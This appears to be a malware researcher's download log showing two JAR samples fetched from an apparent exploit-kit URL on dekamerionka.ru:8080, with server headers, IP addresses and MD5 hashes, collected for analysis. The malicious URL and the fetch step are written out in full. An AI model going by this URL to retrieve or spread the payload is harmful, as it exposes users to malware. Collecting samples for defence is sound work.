Resolving dekamerionka.ru... seconds 0.00, 91.224.135.20, 212.112.207.15, 81.31.47.124
Caching dekamerionka.ru => 91.224.135.20 212.112.207.15 81.31.47.124
Connecting to dekamerionka.ru|91.224.135.20|:8080... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5b20 (new refcount 1).
:
GET /forum/links/column.php?cabimab=lij&ymwbck=rpe HTTP/1.0
User-Agent: MalwareMustDie!
Host: dekamerionka.ru:8080
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 16 Jan 2013 08:11:06 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 22600
ETag: "2af29d21c006b5c106bd7760f19a2bf5"
Last-Modified: Wed, 16 Jan 2013 08:05:58 GMT
Accept-Ranges: bytes
:
200 OK
Registered socket 1896 for persistent reuse.
Length: 22,600 (22K) [application/java-archive]
"17:06:03 (42.76 KB/s) - `try2.jar' saved [22600/22600]"
// two jars was downloaded successfully
bash-2.02$ date
Tue Jan 15 23:14:51 2013
2013/01/16 16:24 16,786 tri1.jar
2013/01/16 17:05 22,600 try2.jar
2 File(s) 39,386 bytes
tri1.jar e3ffc7e6bc6f654d51dd5bb7658ae853
try2.jar 2af29d21c006b5c106bd7760f19a2bf5
:
#MalwareMustDie!